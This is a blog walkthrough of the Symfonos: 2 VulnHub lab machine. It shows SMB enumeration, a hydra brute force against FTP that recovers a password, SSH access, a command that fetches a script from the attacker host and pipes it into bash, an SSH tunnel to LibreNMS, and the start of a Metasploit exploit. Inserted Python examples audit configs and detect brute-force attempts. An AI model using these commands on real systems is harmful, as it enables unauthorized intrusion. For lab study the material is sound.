
John's InfoSec Ramblings

The thoughts of a man working his way through a career in Information Security.

John Svazic


Symfonos: 2

Name       : Symfonos: 2
Difficulty : Intermediate
Type       : boot2root
Source     : VulnHub
URL        : https://www.vulnhub.com/entry/symfonos-2,331/
Entry      : 11 / 30

Welcome to the walkthrough for Symfonos: 2, a boot2root CTF found on VulnHub. This is the eleventh VM in my VulnHub Challenge, and the first in the “intermediate” category! These intermediate machines are more challenging than beginner machines and should represent a similar challenge to those found in the OSCP labs.

The Symfonos family of virtual machines is a more recent set of entries, with Symfonos: 2 having been released on July 18, 2019.

Goal

As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.

Setup

I’m back to using VMware Player to host Kali and the Symfonos: 2 image, with both VMs running in a NAT network. The previous Symfonos machine used VirtualBox, but I have no reason to use it for this release, so I’m going back to my standby VM player.

Discovery

I use netdiscover to search for the IP address of the target VM:

root@dante:~# netdiscover -r 192.168.127.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.127.1   00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.127.2   00:50:56:ee:35:86      1      60  VMware, Inc.
 192.168.127.128 00:0c:29:6a:37:20      1      60  VMware, Inc.
 192.168.127.254 00:50:56:e4:8e:ab      1      60  VMware, Inc.

So it looks like 192.168.127.128 is our target IP, given the IP for my Kali machine is 192.168.127.129.

Scanning

I’ll start with a quick nmap scan to look for open ports, then do a second scan that does a deeper dive into the services behind the open ports using the -sC and -sV flags:

root@dante:~# nmap 192.168.127.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 15:44 EDT
Nmap scan report for symfonos.local (192.168.127.128)
Host is up (0.000089s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:6A:37:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
root@dante:~# nmap -sC -sV -p21,22,80,139,445 192.168.127.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 15:44 EDT
Nmap scan report for symfonos.local (192.168.127.128)
Host is up (0.00056s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:6A:37:20 (VMware)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2019-10-06T14:45:02-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-06T19:45:02
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

Nice mix of interesting services! Now, with Symfonos: 1 I found an SMB share that had some interesting content on it, so I’m going to see if the same applies for Symfonos: 2.

SMB Reconnaissance

I’m going to use smbmap to look for more details on the SMB setup:

root@dante:~# smbmap -H 192.168.127.128
[+] Finding open SMB ports....
[+] Guest SMB session established on 192.168.127.128...
[+] IP: 192.168.127.128:445     Name: symfonos.local
        Disk                                                    Permissions
        ----                                                    -----------
        print$                                                  NO ACCESS
        anonymous                                               READ ONLY
        IPC$                                                    NO ACCESS

Feels like déjà vu! There’s an anonymous share that has read-only access. Time to see what’s in it:

root@dante:~# smbclient -N \\\\192.168.127.128\\anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 18 10:30:09 2019
  ..                                  D        0  Thu Jul 18 10:29:08 2019
  backups                             D        0  Thu Jul 18 10:25:17 2019

                19728000 blocks of size 1024. 16310808 blocks available
smb: \> cd backups
smb: \backups\> dir
  .                                   D        0  Thu Jul 18 10:25:17 2019
  ..                                  D        0  Thu Jul 18 10:30:09 2019
  log.txt                             N    11394  Thu Jul 18 10:25:16 2019

                19728000 blocks of size 1024. 16310808 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (2781.7 KiloBytes/sec) (average 2781.7 KiloBytes/sec)
smb: \backups\> exit

A log file looks interesting, especially if it’s in a backup folder. Let me see what’s hiding inside:

root@dante:~# cat log.txt
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
<snip>
...
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes

root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName                      "ProFTPD Default Installation"
ServerType                      standalone
DefaultServer                   on

<snip>
...
# Set the user and group under which the server will run.
User                            aeolus
Group                           aeolus

# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~

# Normally, we want files to be overwriteable.
AllowOverwrite          on

# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
  DenyAll
</Limit>

# A basic anonymous configuration, no upload directories.  If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
  User                          ftp
  Group                         ftp

  # We want clients to be able to login with "anonymous" as well as "ftp"
  UserAlias                     anonymous ftp

  # Limit the maximum number of anonymous logins
  MaxClients                    10

  # We want 'welcome.msg' displayed at login, and '.message' displayed
  # in each newly chdired directory.
  #DisplayLogin                 welcome.msg
  #DisplayChdir                 .message

  # Limit WRITE everywhere in the anonymous chroot
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>

Wow, this is not what I expected. The log file contains output from at least 3 separate commands, and given the first one is a cat of /etc/shadow, it’s a safe bet that someone with root privileges created this file. But aside from that, there are a few interesting points I can ascertain from this file:

  1. There is a backup of the /etc/shadow file in /var/backups/shadow.bak, so this may be a future target
  2. The anonymous SMB share points to /home/aeolus/share, so aeolus is a valid username
  3. The ProFTPd server also runs as aeolus, so we definitely have a username.
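As an added example (not code from the original walkthrough), the following Python audit reads smb.conf and proftpd.conf fragments like the ones leaked through log.txt and flags exactly the points listed above: a guest-readable share rooted in a user's home directory, an FTP daemon running as an interactive account, DefaultRoot left commented out, and AllowOverwrite on. The fragments are constructed from the excerpt above, and the set of login accounts is an assumption.

```python
"""Audit smb.conf / proftpd.conf fragments for the weaknesses leaked through log.txt."""
import re

# Constructed fragments trimmed from the log.txt excerpt above (the real files are longer).
SMB_CONF = """\
[global]
   workgroup = WORKGROUP

[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes
"""

PROFTPD_CONF = """\
ServerName                      "ProFTPD Default Installation"
User                            aeolus
#DefaultRoot ~
AllowOverwrite          on
<Anonymous ~ftp>
  User                          ftp
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>
"""


def parse_smb(text):
    """Minimal smb.conf reader: {share: {option: value}}; '#' and ';' start comments."""
    shares, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            shares[current] = {}
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            shares[current][key.strip().lower()] = value.strip()
    return shares


def parse_proftpd(text):
    """Return (top-level directives, names seen only in top-level comments); <...> blocks are skipped."""
    top, commented, depth = {}, set(), 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            m = re.match(r"#\s*([A-Za-z]+)", line)
            if m and depth == 0:
                commented.add(m.group(1).lower())
        elif line.startswith("</"):
            depth -= 1
        elif line.startswith("<"):
            depth += 1
        elif depth == 0:          # directives inside <Anonymous>/<Limit> apply to that block only
            parts = line.split(None, 1)
            top[parts[0].lower()] = parts[1].strip('"') if len(parts) > 1 else ""
    return top, commented


def audit_smb(text):
    """Flag guest-accessible shares, especially ones rooted inside a user's home."""
    findings = []
    for share, opts in parse_smb(text).items():
        if share == "global" or opts.get("guest ok", "no").lower() != "yes":
            continue
        m = re.match(r"/home/([^/]+)", opts.get("path", ""))
        where = f" and reveals login name '{m.group(1)}'" if m else ""
        findings.append(f"share [{share}] is guest-readable{where}")
        if opts.get("read only", "yes").lower() != "yes":
            findings.append(f"share [{share}] is guest-writable")
    return findings


def audit_proftpd(text, login_users):
    """Flag an FTP daemon running as a login account, no chroot, and overwrite allowed."""
    findings = []
    top, commented = parse_proftpd(text)
    if top.get("user") in login_users:
        findings.append(f"ProFTPD runs as interactive user '{top['user']}' rather than a service account")
    if "defaultroot" not in top:
        note = " (directive present but commented out)" if "defaultroot" in commented else ""
        findings.append("DefaultRoot unset: authenticated FTP users are not chrooted" + note)
    if top.get("allowoverwrite", "off").lower() == "on":
        findings.append("AllowOverwrite on: authenticated users can replace existing files")
    return findings


if __name__ == "__main__":
    # Login accounts seen in the target's /etc/passwd (assumption: only these two matter).
    for finding in audit_smb(SMB_CONF) + audit_proftpd(PROFTPD_CONF, {"aeolus", "cronus"}):
        print("[!]", finding)
```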

At this point I think it may be prudent to start poking around the other services.

Web Reconnaissance

As with other CTFs, I’m going to start with a simple curl and see what I can pull down from the main URL:

root@dante:~# curl -v http://192.168.127.128
*   Trying 192.168.127.128:80...
* TCP_NODELAY set
* Connected to 192.168.127.128 (192.168.127.128) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.127.128
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: webfs/1.21
< Connection: Keep-Alive
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 183
< Last-Modified: Thu, 18 Jul 2019 13:03:42 GMT
< Date: Sun, 06 Oct 2019 20:19:35 GMT
<
<html>
<style>
html,body{
    margin:0;
    height:100%;}
img{
  display:block;
  width:100%; height:100%;
  object-fit: cover;}
</style>
<body>
<img src="image.jpg">
</body>
</html>
* Connection #0 to host 192.168.127.128 left intact

Nothing terribly exciting. The image.jpg image is actually the header image used for this writeup and is just an image - no steganographic messages hidden within (I checked). Moreover, from the nmap scan earlier I can see that the server header is webfs, which is not particularly interesting. There is a note on the webfs website that says not to use versions prior to 1.20 due to security issues, but this server is running v1.21, so I’m not going to spend much more time on this.

For the record I did run gobuster against it, but I was unable to find anything.

At this point I think that the FTP server is going to be interesting. I have a username, aeolus, and I have my favourite wordlist often used by CTF authors, namely rockyou.txt, so it’s time to see what I can find.

FTP Brute Force

I’m going to use hydra with the /usr/share/wordlists/rockyou.txt wordlist to see if I can find the password for aeolus via the FTP server:

root@dante:~# hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.127.128
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-10-06 16:28:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.127.128:21/
[STATUS] 2695.00 tries/min, 2695 tries in 00:01h, 14341704 to do in 88:42h, 16 active
[STATUS] 2742.33 tries/min, 8227 tries in 00:03h, 14336172 to do in 87:08h, 16 active
[STATUS] 2774.00 tries/min, 19418 tries in 00:07h, 14324981 to do in 86:05h, 16 active
[21][ftp] host: 192.168.127.128   login: aeolus   password: sergioteamo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-10-06 16:37:33

Now that took a bit of time compared to some other CTFs I’ve done as part of this series, but we are on an intermediate machine now, so I suppose that’s to be expected. Regardless, we can see that aeolus has a password of sergioteamo, so let me SSH into the machine. Keep in mind that the FTP server seems to be using the same accounts as what’s on the machine, so I expect this password to work for both SSH and FTP.
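As an added example, not part of the original post, here is a small Python detector for the defensive side of this step: it reads ProFTPD login lines and raises an alert when one source racks up a burst of failures inside a short window, and again when that same source then logs in successfully, which is the pattern hydra produced above. The log line format is modelled on ProFTPD's syslog messages and the sample log is constructed; both are assumptions.

```python
"""Spot FTP password guessing in ProFTPD logs: failure bursts and a success that follows one."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Syslog-style ProFTPD login lines; the format is modelled on ProFTPD's messages
# (assumption) and the sample further down is constructed, not taken from the target.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ proftpd\[\d+\]:? \S+ "
    r"\((?P<src>[^\[\]]+)\[[^\]]+\]\): USER (?P<user>\S+?):? (?P<rest>.*)$"
)
LOG_YEAR = 2019  # syslog timestamps carry no year; fixed for the sample


def parse_line(line):
    """Return (timestamp, source ip, user, success) or None for lines that are not logins."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=LOG_YEAR)
    if m["rest"].startswith("(Login failed)"):
        return ts, m["src"], m["user"], False
    if m["rest"].startswith("Login successful"):
        return ts, m["src"], m["user"], True
    return None


def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """One 'burst' alert per source once `threshold` failures fall inside `window`,
    plus a 'success-after-burst' alert when that source later logs in successfully."""
    recent = defaultdict(deque)   # src -> failure timestamps still inside the window
    burst_seen, alerts = set(), []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        ts, src, user, ok = event
        q = recent[src]
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if ok:
            if src in burst_seen:
                alerts.append((src, user, "success-after-burst", len(q)))
            continue
        q.append(ts)
        if len(q) >= threshold and src not in burst_seen:
            burst_seen.add(src)
            alerts.append((src, user, "burst", len(q)))
    return alerts


def fmt_ts(ts):
    """Syslog timestamp: 'Oct  6 16:28:24' (day is space-padded)."""
    return f"{ts:%b} {ts.day:2d} {ts:%H:%M:%S}"


def sample_log():
    """Constructed log: one mistyped password from .50, then a guessing run from .129
    (25 failures in 25 seconds) that ends with the right password, as hydra did above."""
    base = datetime(LOG_YEAR, 10, 6, 16, 28, 24)

    def entry(ts, src, msg):
        return f"{fmt_ts(ts)} symfonos2 proftpd[2231]: symfonos2 ({src}[{src}]): {msg}"

    lines = [
        entry(base - timedelta(seconds=74), "192.168.127.50", "USER cronus (Login failed): Incorrect password."),
        entry(base - timedelta(seconds=69), "192.168.127.50", "USER cronus: Login successful."),
    ]
    lines += [entry(base + timedelta(seconds=i), "192.168.127.129",
                    "USER aeolus (Login failed): Incorrect password.") for i in range(25)]
    lines.append(entry(base + timedelta(seconds=26), "192.168.127.129", "USER aeolus: Login successful."))
    lines.append(entry(base + timedelta(seconds=27), "192.168.127.129", "FTP session closed."))
    return lines


if __name__ == "__main__":
    for src, user, kind, count in detect(sample_log()):
        print(f"[!] {kind}: {src} -> {user} ({count} failures in window)")
```

A real deployment would also expire burst_seen entries and key the window per user as well as per source, since a guessing run against many accounts from one address shows the same shape.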

LinEnum.sh

Let me SSH to the machine and run my favourite Linux enumeration script, LinEnum.sh:

root@dante:~# ssh aeolus@192.168.127.128
The authenticity of host '192.168.127.128 (192.168.127.128)' can't be established.
ECDSA key fingerprint is SHA256:B1Gy++lPIkpytQPksfdhzAydQ8n3Hlor7srtoKol248.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.127.128' (ECDSA) to the list of known hosts.
aeolus@192.168.127.128's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 08:52:59 2019 from 192.168.201.1
aeolus@symfonos2:~$  wget -qO - http://192.168.127.129/LinEnum.sh | bash

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.97

[-] Debug Info
[+] Thorough tests = Enabled



Scan started at:
Sun Oct  6 15:42:32 CDT 2019


### SYSTEM ##############################################
[-] Kernel information:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.9.0-9-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16)


[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"


[-] Hostname:
symfonos2


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    192.168.201.1    Thu Jul 18 12:12:33 -0500 2019
aeolus           pts/0    192.168.127.129  Sun Oct  6 15:41:19 -0500 2019


[-] Who else is logged on:
 15:42:32 up  1:13,  1 user,  load average: 0.00, 0.32, 0.32
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
aeolus   pts/0    192.168.127.129  15:41    8.00s  0.06s  0.00s bash


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(Debian-exim) gid=109(Debian-exim) groups=109(Debian-exim)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
uid=110(mysql) gid=114(mysql) groups=114(mysql)
uid=111(Debian-snmp) gid=115(Debian-snmp) groups=115(Debian-snmp)
uid=999(librenms) gid=999(librenms) groups=999(librenms)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 16K
drwxr-xr-x  4 root   root   4.0K Jul 18 06:01 .
drwxr-xr-x 22 root   root   4.0K Jul 18 02:31 ..
drwxr-xr-x  3 aeolus aeolus 4.0K Jul 18 09:29 aeolus
drwxr-xr-x  2 cronus cronus 4.0K Jul 18 07:52 cronus

<snip>
...
[-] Listening TCP:
State      Recv-Q Send-Q Local Address:Port               Peer Address:Port
LISTEN     0      80     127.0.0.1:3306                     *:*
LISTEN     0      128          *:5355                     *:*
LISTEN     0      50           *:139                      *:*
LISTEN     0      128    127.0.0.1:8080                     *:*
LISTEN     0      32           *:21                       *:*
LISTEN     0      128          *:22                       *:*
LISTEN     0      20     127.0.0.1:25                       *:*
LISTEN     0      50           *:445                      *:*
LISTEN     0      128         :::5355                    :::*
LISTEN     0      50          :::139                     :::*
LISTEN     0      64          :::80                      :::*
LISTEN     0      128         :::22                      :::*
LISTEN     0      20         ::1:25                      :::*
LISTEN     0      50          :::445                     :::*


[-] Listening UDP:
State      Recv-Q Send-Q Local Address:Port               Peer Address:Port
UNCONN     0      0      127.0.0.53%lo:53                       *:*
UNCONN     0      0            *:68                       *:*
UNCONN     0      0            *:68                       *:*
UNCONN     0      0      192.168.127.255:137                      *:*
UNCONN     0      0      192.168.127.128:137                      *:*
UNCONN     0      0            *:137                      *:*
UNCONN     0      0      192.168.127.255:138                      *:*
UNCONN     0      0      192.168.127.128:138                      *:*
UNCONN     0      0            *:138                      *:*
UNCONN     0      0            *:161                      *:*
UNCONN     0      0            *:5355                     *:*
UNCONN     0      0           :::5355                    :::*

<snip>
...

[-] Current user's history files:
lrwxrwxrwx 1 root root 9 Jul 18 07:52 /home/aeolus/.bash_history -> /dev/null


[-] Location and contents (if accessible) of .bash_history file(s):
/home/cronus/.bash_history
/home/aeolus/.bash_history


[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x  2 root   mail 4096 Oct  6 15:42 .
drwxr-xr-x 13 root   root 4096 Jul 18 07:00 ..
-rw-rw----  1 aeolus mail 1318 Oct  6 15:42 aeolus


### SCAN COMPLETE ####################################
You have new mail in /var/mail/aeolus
aeolus@symfonos2:~$

I’ll admit, there’s a lot of output here. But there are a few things that are interesting to me:

  • The version of the kernel (4.9.0-9)
  • The other users on the system (cronus)

But the biggest thing that stood out for me is the other ports that are listening. I can see that MySQL is running on port 3306 and that there is something running on port 8080. There is an Apache config as well that was in the output of LinEnum.sh, so I’m going to check that out first.

Apache Configuration

I check the /etc/apache2/sites-enabled directory for any other websites that may be enabled:

aeolus@symfonos2:/etc/apache2/sites-enabled$ cd /etc/apache2/sites-enabled/
aeolus@symfonos2:/etc/apache2/sites-enabled$ ls
librenms.conf
aeolus@symfonos2:/etc/apache2/sites-enabled$ cat librenms.conf
<VirtualHost 127.0.0.1:8080>
  DocumentRoot /opt/librenms/html/
  ServerName  localhost

  AllowEncodedSlashes NoDecode
  <Directory "/opt/librenms/html/">
    Require all granted
    AllowOverride All
    Options FollowSymLinks MultiViews
  </Directory>
</VirtualHost>
aeolus@symfonos2:/etc/apache2/sites-enabled$

Cool, there’s something available! It looks simple enough, but I’m not sure what this librenms is. The /opt/librenms/ directory is locked down with 770 permissions and is owned by the librenms user and group, so I have no access. Let me check searchsploit:

root@dante:/opt/LinEnum# searchsploit librenms
----------------------------------------------------------- ----------------------------------------
 Exploit Title                                             |  Path
                                                           | (/usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
LibreNMS - Collectd Command Injection (Metasploit)         | exploits/linux/remote/47375.rb
LibreNMS - addhost Command Injection (Metasploit)          | exploits/linux/remote/46970.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution            | exploits/php/webapps/47044.py
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@dante:/opt/LinEnum#

So there are exploits available, and there are some within Metasploit too! Now all I need is to be able to access that site.

SSH Tunnels

Time for another technique that I used a lot in the OSCP labs: SSH tunnels. I’m going to forward a local port to the Symfonos: 2 machine with a simple SSH tunnel, like so:

root@dante:~# ssh -L 8080:localhost:8080 aeolus@192.168.127.128
aeolus@192.168.127.128's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Sun Oct  6 15:41:19 2019 from 192.168.127.129
aeolus@symfonos2:~$

This creates a local tunnel between my machine and the target machine via SSH. Specifically, I’ve set up a listener so that any traffic sent to port 8080 on my local machine is tunnelled through to port 8080 on the Symfonos: 2 machine. Let me browse to localhost:8080 in a browser and see what this site is all about:

LibreNMS Login Page

I try logging in with aeolus/sergioteamo and it works like a charm! Now there are a lot of options on the site, but I’m mainly interested in finding out what version of LibreNMS is installed so I can confirm I have an exploit for it:

LibreNMS About Page

Unfortunately the version information isn’t that helpful. No problem, I’ll try Metasploit and see.

Exploitation with Metasploit

I’ll start up Metasploit and use the exploit/linux/http/librenms_addhost_cmd_inject exploit:

root@dante:~# msfconsole

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v5.0.52-dev                          ]
+ -- --=[ 1929 exploits - 1079 auxiliary - 332 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
